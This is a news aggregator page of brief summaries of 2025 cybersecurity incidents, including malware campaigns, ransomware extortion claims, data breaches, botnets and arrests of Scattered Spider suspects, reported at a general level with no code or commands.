All news in category "Incidents and Data Breaches"

FBI Warns of Threat Actors Spoofing IC3 Reporting Website

⚠️ The FBI has issued a public service announcement warning that threat actors are creating spoofed versions of the IC3 cybercrime reporting site to steal personally identifiable information and facilitate fraud. The agency advises typing www.ic3.gov directly, avoiding sponsored search results and mismatched URLs, and never paying anyone claiming to be IC3 staff. Victims should report impersonation attempts to the legitimate IC3 portal and provide full details.

Verified Steam Game Drains Streamer's Crypto Donations

🔴 A gamer seeking funds for stage 4 sarcoma lost roughly $32,000 after downloading a verified Steam title, Block Blasters, which had a cryptodrainer component added on August 30. The free-to-play game, published by Genesis Interactive and available on Steam from July 30 to September 21, had positive reviews before turning malicious during a live fundraiser by streamer RastalandTV. Investigators identified batch droppers, a Python backdoor and a StealC payload; victims are advised to reset Steam passwords and move digital assets to new wallets.

Third-day airport chaos after supplier cyber-attack

✈️ A suspected cyber-attack on a third-party supplier's check-in platform caused widespread flight cancellations and delays at several European airports, including Heathrow, Brussels, Berlin and Dublin. RTX's Muse software, used for check-in, boarding-pass validation and baggage tagging, was reported as the target, forcing some airlines to revert to pen-and-paper processes. Airports posted notices saying recovery work is ongoing and urging passengers to confirm flight status and use online check-in where possible.

DPRK Hackers Use ClickFix to Deliver BeaverTail Malware

🛡️ GitLab Threat Intelligence observed DPRK-linked operators using ClickFix-style hiring lures to deliver the JavaScript stealer BeaverTail and its Python backdoor InvisibleFerret. The late-May 2025 wave targeted marketing and cryptocurrency trader roles via a fake Vercel-hosted hiring site that tricks victims into running OS-specific commands. Attackers deployed compiled BeaverTail binaries (pkg/PyInstaller) and used a password-protected archive to stage Python dependencies, suggesting tactical refinement and expanded targeting.

Canada Shuts Down TradeOgre Exchange, Seizes Crypto

🔒 The Royal Canadian Mounted Police have dismantled the TradeOgre cryptocurrency exchange and seized more than $40 million in assets believed linked to criminal activity. The small, privacy-focused platform — which supported Monero and did not enforce Know Your Customer (KYC) checks — was taken offline after an investigation by the RCMP’s Money Laundering Investigative Team. Authorities say the exchange failed to register with FINTRAC and cautioned not all seized funds have been confirmed as criminal proceeds.

LastPass Alerts: Fake GitHub Repos Deliver macOS Infostealer

🛡️ LastPass warns of a widespread campaign leveraging fake GitHub repositories and SEO-poisoned search results to distribute an Atomic-infostealer targeting macOS users. The malicious pages impersonate popular tools such as LastPass, 1Password, and Dropbox, and redirect victims to pages that instruct them to run Terminal commands. Those commands fetch and execute a multi-stage dropper that deploys the Atomic Stealer. Users should verify official vendor pages and avoid running untrusted commands in Terminal.

Iran-linked UNC1549 Compromises 34 Devices in Telecoms

🔒 PRODAFT links a recruitment-themed espionage campaign to an Iran-affiliated cluster tracked as Subtle Snail and attributed to UNC1549 (aka TA455), reporting infiltration of 34 devices across 11 telecommunications organizations in Canada, France, the UAE, the UK and the US. Operators posed as HR recruiters on LinkedIn and delivered a ZIP-based dropper that uses DLL side-loading to install the modular backdoor MINIBIKE, which harvests credentials, browser data, screenshots, keystrokes and system details. MINIBIKE communicates with C2 infrastructure proxied through Azure services, employs anti-analysis measures and achieves persistence via registry modifications to enable long-term access and data exfiltration.

SystemBC Powers REM Proxy, Compromising ~1,500 VPS

🛡️ Lumen Technologies' Black Lotus Labs reports that SystemBC, a C-based SOCKS5 proxy malware, powers roughly 80% of the REM Proxy network and averages about 1,500 compromised hosts per day. The botnet operates through more than 80 C2 servers and mainly targets VPS instances from major commercial providers, often via dropped shell scripts that install the proxy implant. REM Proxy also advertises pools of compromised Mikrotik routers and open proxies and has been used by actors tied to TransferLoader and the Morpheus ransomware group.

Gamaredon and Turla Collaborate in Attacks on Ukraine

🕵️ ESET researchers report that Russian state-linked groups Gamaredon and Turla collaborated in 2025 campaigns targeting high-value Ukrainian defense systems. In February, investigators observed Turla issuing commands via Gamaredon implants and Gamaredon's PteroGraphin downloader being used to restart Turla's Kazuar backdoor. Kazuar harvested machine metadata while Gamaredon later deployed Kazuar v2 installers in April and June. ESET assesses with high confidence that the interactions reflect a deliberate operational convergence.

Ransomware Extortion Claim Targets BMW Group Servers

🔒 The BMW Group has been named on the darknet by the Everest ransomware group, which claims to have stolen critical BMW audit documents, according to screenshots reported by Cybernews. The gang placed two countdown timers on its onion site—one running to Sept. 14 and a second giving BMW 48 hours to make contact. BMW has not commented and the extortionists have not confirmed whether customer or personal data were taken; Cybernews researcher Aras Nazarovas advises waiting for a published sample to assess the scope.

Gamaredon and Turla Collaborate to Deploy Kazuar Backdoor

🔒ESET researchers observed tools from Russian-linked groups Gamaredon and Turla cooperating to deploy the .NET-based Kazuar backdoor on multiple Ukrainian endpoints in early 2025. Gamaredon delivered PowerShell downloaders — PteroGraphin, PteroOdd and PteroPaste — which retrieved Kazuar payloads via Telegraph, Cloudflare Workers domains and direct IP hosting. Analysts assess with high confidence that Gamaredon provided initial access while Turla leveraged the access for espionage, primarily targeting Ukrainian defense-sector assets.

HybridPetya ransomware bypasses Windows Secure Boot

🔒 Researchers at ESET have identified a new bootkit-style ransomware named HybridPetya that targets the NTFS Master File Table (MFT) and can override UEFI Secure Boot to install a malicious EFI component. The malware abuses a patched vulnerability (CVE-2024-7344) in a signed Microsoft EFI file to load an unsigned payload called cloak.dat. The installer replaces the Windows bootloader, triggers a crash and, on reboot, the compromised loader executes a bootkit that encrypts the disk with Salsa20, using a fake CHKDSK message to conceal activity. ESET observed a ransom demand of €850 in Bitcoin but regards the sample as likely a research proof-of-concept.

US Citizen Charged in Vastaamo Psychotherapy Data Extortion

🔒 Finnish prosecutors have charged 28-year-old US citizen Daniel Lee Newhard, an Estonia resident, with aiding and abetting the extortion tied to the notorious 2018 Vastaamo psychotherapy breach. Authorities say IP logs connected extortion infrastructure to an Estonian internet connection and to the suspect’s home address; Newhard denies the allegations. This development follows earlier convictions and ongoing appeals related to the broader Vastaamo scandal.

UK Arrests Two Teens Linked to Scattered Spider Hacks

🔒 UK law enforcement has arrested two teenagers allegedly tied to the Scattered Spider hacking group over an August 2024 cyberattack on Transport for London (TfL). Nineteen-year-old Thalha Jubair and 18-year-old Owen Flowers were detained; authorities say Jubair faces U.S. charges for dozens of intrusions, extortion and money laundering while Flowers faces additional charges linked to U.S. healthcare targets. Prosecutors allege the group extorted at least $115 million in ransoms and that law enforcement previously seized roughly $36 million in cryptocurrency tied to Jubair.

US and UK Charge Two Suspects in Scattered Spider Attacks

🔒 US and UK authorities have charged two UK-based teenagers linked to the Scattered Spider cybercrime group in connection with multiple high-profile intrusions. Thalha Jubair, 19, and Owen Flowers, 18, face US and UK charges including conspiracy to commit computer fraud, wire fraud, money laundering and offences under the UK Computer Misuse Act. Authorities allege extensive social engineering, ransomware extortion and transfers of victim cryptocurrency, with investigators attributing at least $115m in ransom payments to the group. The arrests follow a multinational probe and earlier detentions of other alleged members.

New York Blood Center Breach Exposes 194,000 Records

🔒 The New York Blood Center (NYBCe) confirmed that an unauthorized party accessed internal systems between January 20 and January 26, 2025, and copied files containing personal and health information for nearly 194,000 individuals. Compromised data includes names, Social Security numbers, driver's license or state ID numbers, bank account details for direct deposit, and health/test records. NYBCe says it moved quickly to contain the incident, is offering free identity protection through Experian, and has set up a call line for potentially affected people.

UK Arrests Teens Linked to Scattered Spider TfL Hack

🚨 Two teenagers have been arrested in the UK on suspicion of involvement in the August 2024 cyberattack against Transport for London; authorities say the suspects are believed to be members of the Scattered Spider collective. The National Crime Agency is prosecuting both on computer misuse and fraud-related charges, while U.S. prosecutors also filed charges against one suspect tied to multiple intrusions and extortion schemes. TfL reported that the breach disrupted internal systems and later confirmed customer data, including names and contact details, was compromised, causing operational disruption and financial losses.

SystemBC Turns Compromised VPS into High-Capacity Proxy

🔎 Researchers at Lumen Technology’s Black Lotus Labs say the SystemBC proxy botnet actively targets commercial VPS instances worldwide to build a high-capacity proxy network. The operation averages about 1,500 bots daily, relies on more than 80 C2 servers, and primarily exploits unpatched systems that often contain dozens of vulnerabilities. Customers and operators exhibit poor operational security, and the service is used by ransomware groups and third-party proxy resellers.

SonicWall Urges Password Resets After Backup Files Exposure

🔒 SonicWall is urging customers to reset credentials after detecting suspicious activity that exposed firewall configuration backup files stored in MySonicWall cloud for under 5% of users. Although stored credentials were encrypted, the preference files contained information that could help attackers exploit related firewalls; the company says this was a series of brute-force accesses, not a ransomware event. Customers should verify backups, disable remote management and VPN access, reset passwords and TOTPs, review logs, and import the provided randomized preferences file that resets local passwords, TOTP bindings, and IPSec keys.

PyPI Invalidates Tokens Stolen in GhostAction Attack

🔐 The Python Software Foundation has invalidated PyPI publishing tokens that were exfiltrated during the early-September GhostAction supply chain attack. GitGuardian first reported malicious GitHub Actions workflows attempting to steal secrets, and PyPI found no evidence that the stolen tokens were used to publish malware. Affected maintainers were contacted and advised to rotate credentials and adopt short-lived Trusted Publishers tokens for GitHub Actions. PyPI also recommended reviewing account security history for suspicious activity.